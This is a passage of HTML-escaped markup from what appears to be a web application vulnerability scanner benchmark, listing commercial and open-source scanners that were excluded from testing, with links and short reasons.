Web Application Scanning Features&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(Core Impact)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.parasoft.com/jsp/products/article.jsp?label=product_info_WebKing&quot;&gt;&lt;b&gt;&lt;i&gt;Parasoft
Web Application Scanning Features&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(a.k.a &lt;b&gt;&lt;i&gt;WebKing,
&lt;/i&gt;&lt;/b&gt;by Parasoft)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.dbappsecurity.com/webscan.html&quot;&gt;&lt;b&gt;&lt;i&gt;MatriXay Web Application
Scanner&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(DBAppSecurity)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.buyservers.net/falcove.htm&quot;&gt;&lt;b&gt;&lt;i&gt;Falcove&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(BuyServers
ltd, currently Unmaintained)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l26 level1 lfo19; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.safe3.com.cn/en/safe3wvs.htm&quot;&gt;&lt;b&gt;&lt;i&gt;Safe3WVS 13.1 Commercial
Edition&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(Safe3 Network Center)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The following &lt;b&gt;&lt;i&gt;open source&lt;/i&gt;&lt;/b&gt; web application
vulnerability scanners were &lt;b&gt;&lt;i&gt;not included&lt;/i&gt; &lt;/b&gt;in the benchmark, mainly
due to time restrictions, but might be included in future benchmarks:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;Open Source Scanners not included in this benchmark&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.blackhatacademy.org/security101/Vanguard&quot;&gt;&lt;b&gt;&lt;i&gt;Vanguard&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/webvulscan/&quot;&gt;&lt;b&gt;&lt;i&gt;WebVulScan&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/sqlsentinel/files/&quot;&gt;&lt;b&gt;&lt;i&gt;SQLSentinel&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;https://bitbucket.org/gbrindisi/xsssniper&quot;&gt;&lt;b&gt;&lt;i&gt;XssSniper&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/rabbit-vs/&quot;&gt;&lt;b&gt;&lt;i&gt;Rabbit VS&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/spacemonkey/&quot;&gt;&lt;b&gt;&lt;i&gt;Spacemonkey&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/kayra/&quot;&gt;&lt;b&gt;&lt;i&gt;Kayra&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/2gwvs/&quot;&gt;&lt;b&gt;&lt;i&gt;2gwvs&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/webarmy/&quot;&gt;&lt;b&gt;&lt;i&gt;Webarmy&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/springenwerk/&quot;&gt;&lt;b&gt;&lt;i&gt;springenwerk&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/mopest/&quot;&gt;&lt;b&gt;&lt;i&gt;Mopset 2&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://ha.ckers.org/blog/20060921/xssfuzz-released/&quot;&gt;&lt;b&gt;XSSFuzz 1.1&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/witchxtool-v10/&quot;&gt;&lt;b&gt;&lt;i&gt;Witchxtoolv&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/php-injector/&quot;&gt;&lt;b&gt;&lt;i&gt;PHP-Injector&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.whiteacid.org/xss_assistant.user.js&quot;&gt;&lt;b&gt;XSS Assistant&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Fiddler &lt;/i&gt;&lt;/b&gt;&lt;a href=&quot;http://www.autosectools.com/Page/Fiddler-XSS-Inspector-Overview&quot;&gt;&lt;b&gt;&lt;i&gt;XSSInspector&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;/&lt;/i&gt;&lt;/b&gt;&lt;a href=&quot;http://sourceforge.net/projects/xsrfinspector/&quot;&gt;&lt;b&gt;&lt;i&gt;XSRFInspector&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;
Plugins&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.gnucitizen.org/blog/javascript-xss-scanner/&quot;&gt;&lt;b&gt;GNUCitizen
JAVASCRIPT XSS SCANNER&lt;/b&gt;&lt;/a&gt;&lt;b&gt; &lt;/b&gt;- since WebSecurify, a more advanced tool
from the same vendor is already tested in the benchmark.&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l29 level1 lfo16; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Vulnerability Scanner
1.0 (by cmiN, RST) &lt;/b&gt;- since the source code contained traces for remotely
downloaded RFI lists from locations that do not exist anymore. &lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The benchmark focused on web application scanners that are
able to detect either Reflected XSS or SQL Injection vulnerabilities, can be
locally installed, and are also able to scan multiple URLs in the same
execution.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
As a result, the test &lt;b&gt;did not include&lt;/b&gt; the following
types of tools:&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Online Scanning
Services&lt;/u&gt; &lt;/b&gt;– Online applications that remotely scan applications,
including (but not limited to) Appscan On Demand (IBM), Click To Secure, QualysGuard
Web Application Scanning (Qualys), Sentinel (WhiteHat), Veracode (Veracode), VUPEN
Web Application Security Scanner (VUPEN Security), WebInspect (online service -
HP), WebScanService (Elanize KG), Gamascan (GAMASEC – currently offline), Cloud
Penetrator (Secpoint), &amp;nbsp;Zero Day Scan, DomXSS
Scanner, etc.&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l2 level1 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Scanners without RXSS
/ SQLi detection features&lt;/u&gt;&lt;/b&gt;&lt;u&gt;:&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/dominator/downloads/list&quot;&gt;&lt;b&gt;Dominator&lt;/b&gt;&lt;/a&gt;&lt;b&gt;
&lt;/b&gt;(Firefox Plugin)&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/fimap/&quot;&gt;&lt;b&gt;fimap&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/lfimap/&quot;&gt;&lt;b&gt;lfimap&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/95146/phpbbrfi-scanner.txt&quot;&gt;&lt;b&gt;phpBB-RFI
Scanner&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://dotdotpwn.sectester.net/&quot;&gt;&lt;b&gt;DotDotPawn&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/lfi/&quot;&gt;&lt;b&gt;LFI
(Library-level Fault Injector)&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/97149/lfi_scanner.py.txt&quot;&gt;&lt;b&gt;lfi-scanner&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://packetstormsecurity.org/files/view/102848/lfi-scanner-ver4.0.pl.txt&quot;&gt;&lt;b&gt;LFI-Scanner&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 72.0pt; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -18.0pt;&quot;&gt;
